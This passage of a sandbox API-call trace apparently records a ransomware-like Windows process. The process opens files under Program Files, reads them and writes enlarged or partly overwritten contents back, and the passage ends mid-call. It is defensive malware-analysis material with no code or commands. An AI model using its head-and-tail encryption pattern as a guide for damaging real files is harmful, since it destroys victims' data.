WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.894] ReleaseMutex (hMutex=0x168) returned 1 [0141.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Auckland", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Auckland", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Auckland", lpUsedDefaultChar=0x0) returned 8 [0141.894] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x544, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2d5f2bc*=0x544, lpOverlapped=0x0) returned 1 [0142.002] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0142.002] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xacc, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xacc, lpOverlapped=0x0) returned 1 [0142.003] CloseHandle (hObject=0x1f0) returned 1 [0147.984] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.152] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0149.152] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0149.152] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0149.152] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.152] ReleaseMutex (hMutex=0x168) returned 1 [0149.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Funafuti", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0149.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Funafuti", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Funafuti", lpUsedDefaultChar=0x0) returned 8 [0149.153] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0149.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0149.154] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0149.154] CloseHandle (hObject=0x1dc) returned 1 [0149.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.170] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x55 [0153.170] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.171] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.171] ReleaseMutex (hMutex=0x168) returned 1 [0153.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kosrae", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0153.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kosrae", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kosrae", lpUsedDefaultChar=0x0) returned 6 [0153.171] ReadFile (in: hFile=0x204, lpBuffer=0x1fbad70, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad70*, lpNumberOfBytesRead=0x2d5f2bc*=0x55, lpOverlapped=0x0) returned 1 [0153.173] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0153.173] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0153.173] CloseHandle (hObject=0x204) returned 1 [0153.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.214] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.214] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x79 [0153.215] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.215] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.215] ReleaseMutex (hMutex=0x168) returned 1 [0153.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Noumea", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0153.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Noumea", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Noumea", lpUsedDefaultChar=0x0) returned 6 [0153.215] ReadFile (in: hFile=0x204, lpBuffer=0x1ef9eb8, nNumberOfBytesToRead=0x79, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef9eb8*, lpNumberOfBytesRead=0x2d5f2bc*=0x79, lpOverlapped=0x0) returned 1 [0153.216] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0153.217] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x601, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x601, lpOverlapped=0x0) returned 1 [0153.217] CloseHandle (hObject=0x204) returned 1 [0153.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.219] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.219] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0153.219] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.219] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.219] ReleaseMutex (hMutex=0x168) returned 1 [0153.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahiti", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0153.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahiti", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahiti", lpUsedDefaultChar=0x0) returned 6 [0153.220] ReadFile (in: hFile=0x204, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0153.221] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0153.221] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0153.222] CloseHandle (hObject=0x204) returned 1 [0153.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.223] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.223] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0153.223] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.223] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.223] ReleaseMutex (hMutex=0x168) returned 1 [0153.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CST6", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0153.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CST6", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CST6", lpUsedDefaultChar=0x0) returned 4 [0153.224] ReadFile (in: hFile=0x204, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0153.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0153.225] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0153.225] CloseHandle (hObject=0x204) returned 1 [0153.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.227] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.227] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8f0 [0153.227] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.228] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.228] ReleaseMutex (hMutex=0x168) returned 1 [0153.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PST8PDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0153.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PST8PDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PST8PDT", lpUsedDefaultChar=0x0) returned 7 [0153.228] ReadFile (in: hFile=0x204, lpBuffer=0x25a7bc8, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesRead=0x2d5f2bc*=0x8f0, lpOverlapped=0x0) returned 1 [0153.230] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0153.230] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0xe78, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f2d0*=0xe78, lpOverlapped=0x0) returned 1 [0153.230] CloseHandle (hObject=0x204) returned 1 [0153.230] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.231] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.232] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1e8b1 [0153.232] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.232] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.232] ReleaseMutex (hMutex=0x168) returned 1 [0153.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0153.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=34, lpMultiByteStr=0x1fa53fc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpUsedDefaultChar=0x0) returned 34 [0153.232] ReadFile (in: hFile=0x204, lpBuffer=0x25a7ba8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a7ba8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0153.234] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1d8b1 [0153.234] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.235] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1d8b1 [0153.236] WriteFile (in: hFile=0x204, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.236] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0153.236] WriteFile (in: hFile=0x204, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0153.236] CloseHandle (hObject=0x204) returned 1 [0153.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0153.237] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.238] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7d92 [0153.238] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0153.238] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.238] ReleaseMutex (hMutex=0x168) returned 1 [0153.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0153.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql70.xsl", lpUsedDefaultChar=0x0) returned 9 [0153.238] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.240] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6d92 [0153.240] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.241] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6d92 [0153.242] WriteFile (in: hFile=0x204, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.243] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0153.243] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0153.243] CloseHandle (hObject=0x204) returned 1 [0153.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\median_disable.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\median_disable.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.244] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\median_disable.exe", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft.NET\\median_disable.exe", lpFilePart=0x2d5f690*="median_disable.exe") returned 0x37 [0153.244] GetLastError () returned 0x20 [0153.244] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x51 [0153.244] LocalFree (hMem=0x696c00) returned 0x0 [0153.244] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0153.244] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0153.245] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0153.245] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0153.245] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\median_disable.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\median_disable.exe")) returned 0x20 [0153.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0154.818] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0154.818] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1ca70 [0154.818] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0154.818] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.818] ReleaseMutex (hMutex=0x168) returned 1 [0154.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crashreporter.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0154.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crashreporter.exe", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crashreporter.exe", lpUsedDefaultChar=0x0) returned 17 [0154.818] ReadFile (in: hFile=0x204, lpBuffer=0x28880e8, nNumberOfBytesToRead=0x4000, 